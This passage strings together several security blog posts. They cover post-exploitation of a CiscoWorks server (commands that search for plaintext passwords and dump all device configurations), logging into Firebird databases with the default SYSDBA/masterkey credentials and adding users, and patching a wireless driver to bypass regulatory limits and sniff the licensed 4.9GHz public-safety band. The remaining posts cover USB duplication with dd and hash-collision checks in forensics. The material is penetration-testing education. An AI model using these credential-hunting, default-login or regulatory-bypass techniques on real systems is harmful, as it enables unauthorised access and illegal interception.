  2. Data mine the Cisco works box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful, network engineers are usually responsible for managing Ciscoworks and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a Ciscoworks tool) that disclosed the Cisco Works credentials in plain-text.
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*


Interacting with Ciscoworks

Next we'll take a look out how we can interact with Ciscoworks and pull data from it.

Using the Ciscoworks Web Interface


CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summarizations
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:

C:\> netstat -ano | findstr 1741
TCP 0.0.0.0:1741 0.0.0.0:0 LISTENING 5136

C:\ >netstat -ano | findstr 443
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5136


Using the Ciscoworks Command line Application

The Ciscoworks command line application (cwcli.exe) have tons of options, including remotely running commands on devices! This could be very useful for an attacker, just use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwclie.exe is more or less straightforward, but you'll definitely have to check out the -help for all features.


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli

For detailed help on a command and it's arguments, run
cwcli -help

Dumping Device Configs from CiscoWorks

One note worthy feature of cwclie.exe is its ability to dump device configurations from the command line! If you had an unlimited amount of time, you could obtain every config from every device on the network. Here's how to tell cwclie.exe to grab those configs.


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u -p -device %

SUMMARY
========
Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig


The % character is a wild card when using cwclie.exe. Using this, you could potentially dump all configuration from all Ciscoworks-managed devices! Just note that this could take a really long time on a large network. Also, its probably worth while for us to note that as a general best practice, system administrators should never use the -p option and specify the password on the command line -- this includes within scripts.

And just to confirm we dumped some configurations:

C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011 06:40 PM <DIR> .
12/25/2011 06:40 PM <DIR> ..
12/25/2011 06:40 PM 26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011 06:40 PM 26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011 06:40 PM 30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011 06:40 PM 27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011 06:40 PM 30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011 06:40 PM 30,833 2011-11-09-06-40-31-247-devicename.xml
6 File(s) 173,101 bytes
2 Dir(s) 129,615,876,096 bytes free



Enjoy!


Fun with Firebird Database Default Credentials

$
0
0
by Tony Lee.

I have had a few internal network penetration tests now in which I came across the following finding identified by McAfee Vulnerability Manager (MVM): "Firebird SQL Default Credentials Detected". So I figured I'd share with you what is required to interact with the database and provide you with ideas on what you can do after you connect. Tune in for a future article on more fun with Firebird.

What is the Firebird Database?

Firebird is a relational SQL database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names (the most famous being "InterBase") since 1981.

In 2000, Borland decided to release InterBase 6.0 as Open Source. Firebird is an independent development, beginning with these sources, driven by an Open Source Community and funded by the Firebird Foundation.”

--Source: http://www.destructor.de/firebird/index.htm

Identifying Firebird Databases

Vulnerability scanners

Perhaps the easiest method to find Firebird databases is by using a vulnerability scanner. MVM and Nessus will also let you know if the database is configured with default credentials. Here are the findings from MVM and Nessus:
  • McAfee Vulnerability Manager (MVM): Firebird SQL Default Credentials Detected
  • Nessus: Firebird Default Credentials

Port scan

You can use any port scanner to check for TCP port 3050. Note that this is just the default port and can always be changed by the admin. A simple port scan to find it would be:
 root@bt:~# nmap -sS -T4 -PN -p 3050 192.168.1.0/24


Firebird Database Tools

There are plenty of tools to interact with Firebird. Most commonly that can be grouped into either a client or a Database management tool. We'll look at one of each.

FlameRobin (Client)

"FlameRobin is a database administration tool for Firebird RDBMS. Their goal is to build a tool that is:
  • lightweight (small footprint, fast execution)
  • cross-platform (Linux, Windows, Mac OS X, FreeBSD, Solaris)
  • dependent only on other Open Source software"

--Source: http://www.flamerobin.org/

It is easily installed on BackTrack (or other distros that utilize apt):
<
 root@bt:~# apt-get install flamerobin


To run, launch X windows and type:
 root@bt:~# flamerobin


You may get the following error message, ignore it and continue:
 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users. You may now register new servers and databases.


gsec (DB MGMT Tool)

This is the official tool to interact locally with the Firebird Database. gsec is a command line utility used to connect to the security.fdb in order to manage users. This tool must be run on the database server itself as it has no parameter to be run remotely, however this could be combined with psexec for remote execution if you had sufficient OS credentials.

Interrogating the Database

With access to the database, you can do any number of tasks. We'll look a couple to get you started.

Retrieve Remote Server Version

Using FlameRobin, first “register” the remote server so you are able to communicate with it. First open the FlameRobin GUI, then goto Server -> Register Server -> and enter the following:
  • Display name: Friendly name to call the host, I use the IP
  • Hostname: Hostname or IP address
  • Port Number: will usually be 3050, however this instance is running on another port.


Registering the Server so we can communicate with it


Next, right click on the server that you just registered, choose "Retrieve server version" and provide your credentials. The default firebird username and password is usually:

Username: SYSDBA
Password: masterkey



You should be provided the version number as shown below:



Adding/Changing Users

Another useful task is to add or change user accounts. An interesting piece of information is that the Firebird database does not check any characters beyond 8 in a password. Thus the masterkey default password might as well be “masterke” as the ‘y’ at the end is never checked because it is beyond 8 characters. Additionally, usernames are not case sensitive, however passwords are CaSe SeNsItIvE.

With FlameRobin

Use the instructions above in the “Retrieve Remote Server Version” section in order to register the remote server if you have not done so already. Then right-click on the server that you just registered, select "Manage Users" and enter the SYSDBA credentials if they are not saved from the remote version enumeration above.



To add a user, just click "Add User" and provide the required information! To modify other users (including changing their passwords) by clicking on the “details” icon which looks like a magnifying glass over a piece of paper.

With gsec

Since gsec a command line utility used to connect to the security.fdb in order to manage users, it must be run on the database server itself as it has no parameter to be run remotely. However, this could be combined with psexec for remote execution if you have sufficient OS credentials.

Common command line options:
    -di[splay]
Display all rows from security.fdb
-di[splay] name
Display information only for user name
-a[dd] name -pw password
Add a user named user with a password of password.
-mo[dify] name [options]
Modify the account name, optionally as specified by options.
-de[lete] name
Delete user name from security.fdb
-h[elp] or ?
Displays gsec commands and syntax


To add a "Tony" user with the password of "S3kR3tP4$$":
 gsec -user sysdba -pass masterkey -add Tony -pw S3kR3tP4$$


To modify users, define the username and password used to connect to the database with "-user" and "-pass", then use the "-mo" parameter to define the user account and "-pw" to define the new password.
 gsec -user sysdba -pass masterkey -mo  -pw 


Mitigation

The easiest way to help protect yourself is to change the default password to something complicated! Go to a command shell, cd to the Firebird bin subdirectory and issue the following command to change the password:
 gsec -user sysdba -pass masterkey -mo sysdba -pw 


Notice that you specify “sysdba” twice in the command:

With the -user parameter you identify yourself as SYSDBA. You also provide SYSDBA's current password in the -pass parameter. The -mo[dify] parameter tells gsec that you want to modify an account – which happens to be SYSDBA again. Lastly, -pw specifies the type of modification: the password. --Source: http://www.firebirdsql.org/manual/qsg2-config.html

More Info



Run across this in your own adventures? Tell us about it in the comments below!

Sniffing on the 4.9GHz Public Safety Spectrum

$
0
0
By Brad Antoniewicz.

Probably the most important thing to mention about the 4.9GHz spectrum is that you need a license to operate in it! If you don't have a license (I'm pretty sure you don't) - IT MAY BE ILLEGAL TO INTERACT WITH THIS BAND.

You've been warned - That all being said, let's talk about public safety.

What is the Public Safety Spectrum?

The Public Safety Spectrum is the name for a number of reserved ranges in radio spectrum allocated by the FCC and dedicated for the "sole or principal purpose of protecting the safety of life, health, or property". Basically it's used for police, ambulance, fire, and in some cases, utilities to communicate.

The 4.9GHz Public Safety Spectrum (4.940GHz to 4.990GHz) is one of these reserved public safety ranges. It's mainly for short distance, almost line of sight, communications. It's used from everything to create "on the scene" networks so that the police and other responders can share and transfer data, to video camera systems around a fixed location.

The neat thing about the 4.9Ghz spectrum is that the pretty much de-facto standard used in it is IEEE802.11! It takes some deviations from the standard, such as allowing for 1MHz, 5MHz, 10MHz or 20MHz channels, but other then that, it is plain old 802.11 on a different spectrum.

Interacting with the Spectrum

To interact with the spectrum, you'll need an FCC LICENSE (!! if you skipped to this part, please see the first paragraph), and an adapter that is capable of transmitting/receiving on the 4.9GHz spectrum. There are some adapters already out there, such as the Ubiquiti SuperRange 4 Cardbus (SR4C), but no one likes spending more money if they don't have to!

An 4.9GHz adapter you might have already in your possession and not even know it is the Ubiquiti SuperRange Cardbus (SRC or SRC300)! The internal Atheros chipset actually supports from 4.910GHz to 6.1GHz! That's much more then originally advertised :)

The problem is though, if you want to use the cards with any of the standard Linux tools, you're more or less screwed! The current ath5k drivers don't officially support 4.9GHz. There are a couple of patches for older versions of the driver, but some don't work or can't be applied to the current stable driver release. Another issue is that some drivers don't support the 5MHz, 10MHz or 20MHz channel widths.

About the 4.9GHz Driver Patch

I took some time out and wrote up a quick patch for the current version of compat-wireless. I used some of the patches mentioned above as starting point, and then followed the code comments in the existing drivers to implement the channel widths correctly.

Enabling 4.9GHz


To enable the extended frequency ranges, I just modified the driver to accept frequencies as low as 4.910GHz. There was a "ath_is_49ghz_allowed()" function that defined if the regulatory domain was allowed to access that range. I modified this function to always return true. The regulatory domain is often stored within your cards EEPROM and defines what region the card will be operating in. The mac80211 drivers query this value to determine what frequencies you're allowed to use. Based on that value, the driver will either consult its internal (statically defined) regulatory database, or if present, the Central Regulatory Domain Agent (CRDA). The CRDA is a user land agent that defines what frequencies are used within a region. The idea is that if you're in a different regulatory domain then the one your card is registered for, you can dynamically change the allowed frequencies without making any driver changes. You would do this with the "iw" command:
 root@bt:~# iw reg set &LT;VALUE&GT;


One problem I came across is that the driver won't consistently respect a regulatory domain that is defined this way. For example, if my card's EEPROM is set for US, but I set the World regulatory domain ("00"), sometimes it won't actually apply it or won't allow me to use the channels enabled by the extended regulatory domain. Because of this, I took the somewhat brutish approach of just returning true for "ath_is_49ghz_allowed()".

I really wanted to make this patch work with the smallest number of module changes, because the more complicated the module change, the more likely it will break in future releases. Plus, most of the code to support 4.9GHz was already there!

Rather than setting the 4.9GHz channels, etc.. statically within the driver, I also decided to leverage the CRDA, since it can be changed without needing the driver to be rebuilt.

Channel Widths


By default the compat-wireless drivers support 20MHz channel widths. Because 4.9GHz can have 1MHz, 5MHz, 10MHz, or 20MHz channels, the driver needed to be modified to support this. Luckily the driver code comments spell out what needs to be done, and much of the support already existed - it just wasn't used. I modified the drivers as per the code comments, and took a tip from the RADAR patch by adding the "default_bwmode" module parameter so that people can specify the channel width when they load the module.

Installation

Installing the patch is easy. Since I use non-persistent BackTrack for everything, I'll provide instructions using that as a base. You can either perform the installation manually or the "easy way" which is using a script I created.

Download

You should really read on, but if you're impatient and just want stuff to download, here is the download link:

The Easy Way

If you'd like to use this method, you'll just need internet access. Also, once you complete the "easy" way, you can use that directory for an offline installation later on. To install make sure you have internet access and:
 root@bt:~# git clone https://github.com/OpenSecurityResearch/public-safety
root@bt:~# cd public-safety/4.9ghz/
root@bt:~/public-safety/4.9ghz# chmod +x 49ghz_install.sh
root@bt:~/public-safety/4.9ghz# ./49ghz_install.sh


That should be it (told you it was easy)! It'll auto create a monitor mode VAP using 10mhz wide channels.

Manual Installation

Manual installation is pretty simple too, but some people hate typing :) To install everything from scratch, first install all the prerequisites:
 root@bt:~# apt-get install libnl-dev libssl-dev python-m2crypto build-essential 


Next, we'll need to set up CRDA. The CRDA consults a database for its regulatory information. This database is called the wireless-regdb. You'll also need to sign the database. So lets create some keys to do that:
 root@bt:~# openssl genrsa -out key_for_regdb.priv.pem 2048 
root@bt:~# openssl rsa -in key_for_regdb.priv.pem -out key_for_regdb.pub.pem -pubout -outform PEM


Now, we'll download wireless-regdb, extract it, and build:
 root@bt:~# wget http://linuxwireless.org/download/wireless-regdb/wireless-regdb-2011.04.28.tar.bz2
root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
root@bt:~# cd wireless-regdb-2011.04.28
root@bt:~/wireless-regdb-2011.04.28# make


The regulatory database is just a plain-text file that is then converted to the format CRDA expects. You can modify your database any way you'd like, or you can just use the one I created (db-ReturnTrue.txt):
 root@bt:~/wireless-regdb-2011.04.28# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/db-ReturnTrue.txt
root@bt:~/wireless-regdb-2011.04.28# cp db-ReturnTrue.txt db.txt
root@bt:~/wireless-regdb-2011.04.28# ./db2bin.py regulatory.bin db.txt ../key_for_regdb.priv.pem
root@bt:~/wireless-regdb-2011.04.28# make install


Now that our regulatory database is all set up, lets install CRDA to leverage it. Notice that after we download and extract, we also copy over our public keys to the locations CRDA is expecting them to be. This is so it can validate the authenticity of the regulatory database we created.
 root@bt:~# wget http://linuxwireless.org/download/crda/crda-1.1.2.tar.bz2
root@bt:~# tar -jxf crda-1.1.2.tar.bz2
root@bt:~# cd crda-1.1.2
root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem pubkeys/
root@bt:~/crda-1.1.2# cp ../key_for_regdb.pub.pem /usr/lib/crda/pubkeys
root@bt:~/crda-1.1.2# make
root@bt:~/crda-1.1.2# make install


So now we can get to the compat-wireless installation. First download it, then extract:
 root@bt:~#  wget http://www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.3/compat-wireless-3.3-1.tar.bz2
root@bt:~# tar -jxf compat-wireless-3.3-1.tar.bz2
root@bt:~# ln -s /usr/src/linux /lib/modules/`uname -r`/build
root@bt:~# cd compat-wireless-3.3-1


Next we'll unload any conflicting drivers (I'm being a little redundant with these two commands, I know):
 root@bt:~/compat-wireless-3.3-1# sudo scripts/wlunload.sh
root@bt:~/compat-wireless-3.3-1# sudo modprobe -r b43 ath5k ath iwlwifi iwlagn mac80211 cfg80211


And then tell compat-wireless to just compile ath5k:
 root@bt:~/compat-wireless-3.3-1# scripts/driver-select ath5k


Now we'll download the default set of patches for BT5R2 and apply them (you may get some errors when applying, you should be able to ignore them):
 root@bt:~/compat-wireless-3.3-1# wget http://www.backtrack-linux.org/2.6.39.patches.tar
root@bt:~/compat-wireless-3.3-1# tar -xf 2.6.39.patches.tar
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/mac80211.compat08082009.wl_frag+ack_v1.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/zd1211rw-2.6.28.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < patches/ipw2200-inject.2.6.36.patch


Then lets apply the 4.9ghz patch:
 root@bt:~/compat-wireless-3.3-1# wget https://raw.github.com/OpenSecurityResearch/public-safety/master/4.9ghz/compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch
root@bt:~/compat-wireless-3.3-1# patch -p1 < compat-wireless-3.3-1_ath5k-49GHZ+BWMODE.patch


Ok! now we're ready to build:
 root@bt:~/compat-wireless-3.3-1# make
root@bt:~/compat-wireless-3.3-1# make install
root@bt:~/compat-wireless-3.3-1# cd ..


After this, we're more or less finished. The thing is that you'll probably want to also upgrade your kismet to find these networks. It's highly recommended that you use the latest version of kismet from the git repo.

Updating Kismet

If you followed the easy way above, then you should be already updated. If you're following the manual way, uninstall the installed version of kismet:
 root@bt:~# dpkg -r kismet


Then grab the latest development version of kismet and compile it:
 root@bt:~# git clone https://www.kismetwireless.net/kismet.git
root@bt:~# cd kismet
root@bt:~/kismet# ./configure
root@bt:~/kismet# make dep
root@bt:~/kismet# make
root@bt:~/kismet# make install


You'll also need to define a new channel list in your kismet.conf to support this. I've added the following. I chose to use .5MHz channel spacing since many 4.9GHz deployments have varying channel layouts.
 channellist=ps5mhz:4920-4990-5-.5
channellist=ps10mhz:4920-4990-10-.5
channellist=ps20mhz:4920-4990-20-.5


Finally, to change to a different channel width (other than 20MHz) you'll need to define the "default_bwmode" module parameter. For 5MHz channels, define "default_bwmode=1", for 10MHz, "default_bwmode=2", and for 40MHz, "default_bwmode=3". Also, for whatever reason, if you're using a channel width other than 20MHz, you'll also need to manually create a monitor mode VAP (e.g. "mon0") and use that as your source for kismet. Here's how to set it up:
 root@bt:~# modprobe ath5k default_bwmode=2
root@bt:~# iw dev wlan1 interface add mon0 type monitor
root@bt:~# ifconfig mon0 up
root@bt:~# iwconfig mon0 freq 4.920G


Is it Working?

Once everything is running, kismet should look normal, just with the previously undiscovered AP available! Note that this band is highly regulated in the US, so you won't see these networks everywhere. And since the transmit distance is so small, you'll likely need to be in near line of sight of the 4.9GHz network you're looking at. Here's a screen shot of kismet discovering our test AP (located in a faraday cage, in a country where it is legal to transmit on 4.9GHz, of course):


Want to learn more?

This article is a precursor to the talk Robert Portvliet and I will be giving this year at Defcon 20. So if this sparks your interest, stop by - we'll be talking about 4.9GHz and the other Public Safety Bands!

A Simple USB Thumb Drive Duplicator on the Cheap

$
0
0
By Tony Lee and Matt Kemelhar.

You may have had to shop for a USB duplicator for some reason or another and noticed that they can be quite expensive and the product reviews are not always very encouraging. At Foundstone, we teach a few classes that require each student to have the same Foundstone customized USB stick—thus we have a need for one of these expensive devices—especially when we need upwards of 100 sticks created in a weekend.

After scouring the web and reading reviews, we resorted to buying a duplicator that was around $300 and could duplicate 7 USB sticks at a time. Our first batch finished without a hitch - until we tried to boot off of them. It turns out this product cannot duplicate a bootable USB stick which we needed for a LIVE Linux distro. We contacted customer support and they even went as far as to rewrite the software to try to get it to do what we wanted—unfortunately, without any success.

When all hope was lost, we turned to some Linux dd foo. As it turns out, you don’t need the expensive hardware. All you need is a standard USB hub, dd, and some command line magic.

Overall, the process involves the following steps:
  1. Finding a good USB hub
  2. Getting a copy of dd
  3. Determining the drive mapping
  4. Executing the foo


Finding a good USB hub

Ironically, the very expensive “7-port USB duplicator” that we purchased last year served as our first USB hub, however we later realized that ANY USB hub would work. If you are going to use an old hub you have laying around, you can skip this section. Otherwise, there are a few things you may want to consider if you are going to purchase a new hub:

Number of ports


This will vary depending on the size of your project. As stated earlier, we have to duplicate 100 or more USB sticks in a weekend, so for us… the more ports the better. The USB hub I purchased this year was simply a hub (and not a “duplicator”), but it has 7 ports.

U-Speed H7928-U3: 7-port USB 3.0 hub
Price: Less than $50 on amazon - much cheaper (1/6th) than our USB 2.0 7-port “duplicator”

USB hub speed


The duplicator we originally purchased was a USB 2.0 hub. However, I also used an old Belkin USB 1.1 4-port hub to successfully test duplication as well. This year, we went with a USB 3.0 hub to determine the performance increase—if any.



Spacing between ports


This is something you hopefully do not learn the hard way. When buying a USB hub, you have to keep in mind the bulkiness of the USB sticks you may have to duplicate. Take the image below for example with USB sticks of varying width. The Flash Voyager and the Verbatim stick (lower left) are wider than the Cruzer (lower right) and DataTraveler sticks (top right).



If the spacing between the ports on the hub is too close together and you happen to find a wider stick on-sale when you are buying, you will not be able to fit all of the sticks into the hub at the same time—thus involuntarily reducing your 7 usable ports down to 4.

We took this into consideration when we purchased the USB 3.0 USpeed hub mentioned above. As you can see in the image below there is plenty of space between the ports which accommodates the wider/bulkier USB sticks that may be on-sale.


Source: Amazon product page


An example of a hub that has ports that are too close together was the old USB 1.1 4-port belkin I had laying around the house:


Source: Belkin F5U021 product page


Power requirements


This is not too much of an issue, but it is something to keep in mind. Most of the USB hubs can be powered off of the USB port itself or an external power source. When you are duplicating many sticks at the same time, you may want to plug in to a wall socket—even if you think you can power the hub via USB. The power source can sometimes affect speed and reliability of the copies.

Reviews


One of the deciding factors in our most recent purchase was the positive remarks about the hub (beware of shills!). We recommend choosing a hub that is industry proven and popular for speed, features, and reliability.

Lights on each port


This may seem like a minor and nitpicky feature, however having lights on the individual ports is often helpful to ensure:
  1. The USB port is functioning
  2. The USB stick is functioning
  3. The USB stick is seated properly
  4. Data is being written to the stick

Getting a copy of dd

dd is an old school *nix command that does low-level bit for bit copying. It is a very versatile and easy to use tool. Common uses are acquiring a forensic image of media, creating backup images (ISO’s) of CD’s or DVD’s, performing drive backups and now, duplicating USB sticks.

There are ports of dd for Windows, but many of them have some limitation—thus we prefer to use dd natively in *nix. Ironically, since we are duplicating bootable Linux distributions, we use one of the USB sticks that we manually created in order to boot to that and make the others. We create two USB sticks the manual way (one to boot from and one to copy).

Determining the drive mapping

Depending on the operating system, the USB sticks may be auto-mounted. It is important that you unmount the drives before starting the duplication process. There are several ways in which you can determine how the USB sticks were mounted and how to address them.

Monitoring/var/log/messages


For real time detection, just use tail:
root@box:~# tail –f /var/log/messages
Jul 1 16:16:59 DVORAK kernel: [174268.742086] usb 1-1: new high-speed USB device number 5 using ehci_hcd
Jul 1 16:17:00 DVORAK kernel: [174269.149525] scsi6 : usb-storage 1-1:1.0
Jul 1 16:17:01 DVORAK kernel: [174270.252811] scsi 6:0:0:0: Direct-Access Kingston DataTraveler G3 PMAP PQ: 0 ANSI: 0 CCS
Jul 1 16:17:01 DVORAK kernel: [174270.260034] sd 6:0:0:0: Attached scsi generic sg2 type 0
Jul 1 16:17:01 DVORAK kernel: [174270.779011] sd 6:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
Jul 1 16:17:01 DVORAK kernel: [174270.786126] sd 6:0:0:0: [sdb] Write Protect is off
Jul 1 16:17:02 DVORAK kernel: [174270.834954] sdb: sdb1
Jul 1 16:17:02 DVORAK kernel: [174270.860634] sd 6:0:0:0: [sdb] Attached SCSI removable disk




dmesg - print or control kernel messages


For a running history, you can use “dmesg | less” and then hit ‘G’ to go to the bottom and find your USB sticks. You will find something like the following indicating that the operating system has detected and labeled the device /dev/sdb:
[  981.231497] Initializing USB Mass Storage driver...
[ 981.231586] scsi3 : usb-storage 1-1:1.0
[ 981.231792] usbcore: registered new interface driver usb-storage
[ 981.231794] USB Mass Storage support registered.
[ 982.235921] scsi 3:0:0:0: Direct-Access Kingston DataTraveler G3 PMAP PQ: 0 ANSI: 0 CCS
[ 982.238374] sd 3:0:0:0: Attached scsi generic sg2 type 0
[ 982.248017] sd 3:0:0:0: [sdb] 7826688 512-byte logical blocks: (4.00 GB/3.73 GiB)
[ 982.252239] sd 3:0:0:0: [sdb] Write Protect is off
[ 982.252243] sd 3:0:0:0: [sdb] Mode Sense: 23 00 00 00
[ 982.256745] sd 3:0:0:0: [sdb] No Caching mode page present
[ 982.256749] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.276716] sd 3:0:0:0: [sdb] No Caching mode page present
[ 982.276719] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.278560] sdb: sdb1
[ 982.291142] sd 3:0:0:0: [sdb] No Caching mode page present
[ 982.291145] sd 3:0:0:0: [sdb] Assuming drive cache: write through
[ 982.291148] sd 3:0:0:0: [sdb] Attached SCSI removable disk




fdisk –l– partition table manipulator and viewer


fdisk with the –l (lower case L) will list the devices as shown:
 Disk /dev/sdb: 4007 MB, 4007264256 bytes
74 heads, 10 sectors/track, 10576 cylinders
Units = cylinders of 740 * 512 = 378880 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier:

Device Boot Start End Blocks Id System
/dev/sdb1 * 11 10577 3909312 b W95 FAT32




Executing the foo


Once you have determined the number of drives detected and how they are to be referenced, you are ready to execute the foo. Make sure you do not switch around source (if) and destination (of) as defined below: For example, if you have 2 drives you are imaging it may look something like this:

Originating drive: /dev/sdf
First drive: /dev/sdd
Second drive: /dev/sde
 root@box:~# dd if=/dev/sdf |pv| tee >(dd of=/dev/sdd bs=16M) | dd of=/dev/sde bs=16M





Syntax explanation:
dd = program used to duplicate
if = input file (source drive)
of = output file (destination drive)
pv = pipe viewer (for copying statistics)
tee = program used to redirect input and output
bs = option of dd to control blocksize – could be adjusted for potential speed increase

An example if you have 4 drives you are imaging it may look something like this:

Originating drive: /dev/sdd
First drive: /dev/sde
Second drive: /dev/sdf
Third drive: /dev/sdg
Fourth drive: /dev/sdh

 root@box:~# dd if=/dev/sdd |pv| tee >(dd of=/dev/sde bs=16M) >(dd of=/dev/sdf bs=16M) >(dd of=/dev/sdg bs=16M) | dd of=/dev/sdh bs=16M



Performance

Duplication performance will vary depending on the setup, however in the next article we will reveal how our different setups did and hopefully extract some useful information that may save you time and money.

Overall results

The command syntax above worked great for us and duplicated over 100 drives with no issues at all—most of the time duplicating up to 7 drives simultaneously. As we realize that there are many ways to get the job done—if you have other commands, tools, or parameter adjustments that you have used that worked well, we would love to hear about them.


Detecting File Hash Collisions

$
0
0
By Pär Österberg Medina.

When investigating a computer that is suspected of being involved in a crime or that might be infected with a malware, it is important to try to remove as many known files as possible in order to keep the focus of the analysis on the files you have not seen or analyzed before. This is particular useful in malware forensic when you are looking for something out of the ordinary, something you might not have seen before. In order to remove files from the analysis, a cryptographic checksum of the file is generated that is matched in a hash database. These hash databases are divided up in categories with files that are either known to be good, used, forbidden or bad.

Another common use of hash functions in computer forensics is to use them to verify the integrity of an acquired hard drive image or any other piece of data. A cryptographic hash of the data is generated when the evidence is acquired that later can be used to verify that the content has not changed. Even though newer hash functions exists, in computer forensics we are still relying on MD5 and SHA-1. These hash functions was written a long time ago and has flaws that can be used to generate something called hash collisions. In this blog post I will show how these collisions can be detected so we still can use our old trustworthy hash function - even though they are broken.

Hash Collision

You have most likely heard about hash collisions before and how they can be used for malicious intent. Briefly explained, a collision attack is when a file or a message produces the same hash even though the content of the files are different. To illustrate how this can look I have generated what on the surface seems to be two identical programs.

pmedina@forensic:~$ wc -c prg1 prg2
9054 prg1
9054 prg2
18108 total
pmedina@forensic:~$ md5sum prg1 prg2
850d1dc3d24f0ea753a7ee1d5d8bbea9 prg1
850d1dc3d24f0ea753a7ee1d5d8bbea9 prg2



The files above have the same size and produce the same MD5 checksum. However when we execute the programs they produce a completely different result.

pmedina@forensic:~$ ./prg1
Let me see your identification.
pmedina@forensic:~$ ./prg2
These aren't the droids you're looking for



Detecting Hash Collisions

In the example above I showed two files that both had the same size and shared the MD5 checksum. Even though there have been documented hash collisions in both the MD5 and SHA-1 hash functions, it highly unlikely that a collision might occur on multiple hash functions at the same time. As you can see below, the files do not produce the same SHA-1 checksum and are therefore considered to be unique.
pmedina@forensic:~$ sha1sum prg1 prg2
a246766fc497e4d6ed92c43a22ee558b3415946a prg1
b9c22ad10b61009193aa8b312c6ec88f44323119 prg2



The danger of white listing files and removing them from a forensic investigation is that you have to be absolutely sure that the files you are excluding for analysis are exactly the files you want to remove. Even though there has been no public demonstration of a definite hash collision - an attack where a new file has been generated to produce the same hash as an existing file, I always like to be extra careful when removing files that generates matches in my hash databases. To verify that the files are indeed the same file is something that can be done by mapping a hash to another hash - a technique I call "hashmap".

Hashmap'ing a hash database

In order for us to be able to hashmap a hash database, the database needs to include at least two hashes created by using two different hash functions. Fortunately for us, the databases we generated that are using the RDS format or the NSRL databases we downloaded from NIST, both lists the MD5 and SHA-1 hash in each entry. I have previously showed how the program ‘hfind’ can be used to both create an index from a database as well as how to use that index to search the database. When ‘hfind’ finds a match for a hash we search for, the program will print the filename of the file that matched the hash.

pmedina@forensic:~$ md5sum /files/RedDrive.zip
2e54d3fb64ff68607c38ecb482f5fa25 /files/RedDrive.zip
pmedina@forensic:~$ hfind /tmp/example-rds-unique.txt
2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 RedDrive.zip



This functionality of ‘hfind’ is something we can use when we want to hashmap a MD5 hash to the SHA-1 hash of the same file. In order for this to work, we need to replace the value in the database that holds the filename with the SHA-1 checksum of the file. This can be done in many ways but to demonstrate this I will use the Unix command ‘awk’ on one of the hash databases I have generated before.

pmedina@forensic:~$ head -1 /tmp/example-rds-unique.txt > /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ tail -n +2 /tmp/example-rds-unique.txt | awk -F, '{print $1","$2","$3","tolower($1)","$5","$6","$7","$8}' >> /tmp/example-rds-unique-hm-sha1.txt
pmedina@forensic:~$ head -3 /tmp/example-rds-unique-hm-sha1.txt
"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"
"000e9b6b962bdbcd5b0ff01635a417cce833490e","b0efd5eacfe6f1e251b8870d486326af","c8f43198","000e9b6b962bdbcd5b0ff01635a417cce833490e",96,0,"WIN",""
"001121f9dc35ab520b207908f0f26c48979ed497","6efca4942c73ab0b17875fd729b2d03a","2e929525","001121f9dc35ab520b207908f0f26c48979ed497",72,0,"WIN",""



As you can see the field that used to hold the filename now holds the SHA-1 checksum of the file instead. Since the offsets to the file entries in our hashmap database are not the same as in the original database, we do also need to create a new index.

pmedina@forensic:~$ hfind -i nsrl-md5 /tmp/example-rds-unique-hm-sha1.txt
Index Created



Using our new database to search for the MD5 checksum now’ prints the SHA-1 hash of the file instead of the file name. This hash can we verify by generating a SHA-1 checksum of the file we are investigating.

pmedina@forensic:~$ hfind /tmp/example-rds-unique-hm-sha1.txt 2e54d3fb64ff68607c38ecb482f5fa25
2e54d3fb64ff68607c38ecb482f5fa25 d9c40dd2f1fb08927e773a0dc70d75fedd71549e
pmedina@forensic:~$ sha1sum /files/RedDrive.zip
d9c40dd2f1fb08927e773a0dc70d75fedd71549e /files/RedDrive.zip



Now we know for sure that the file we have on disk is exactly the same as we have in our database. We can of course also reverse this process to create a hashmap database that will print the MD5 hash when we query the database using a SHA-1 hash.

Modifying ‘hfind’ to hashmap automatically

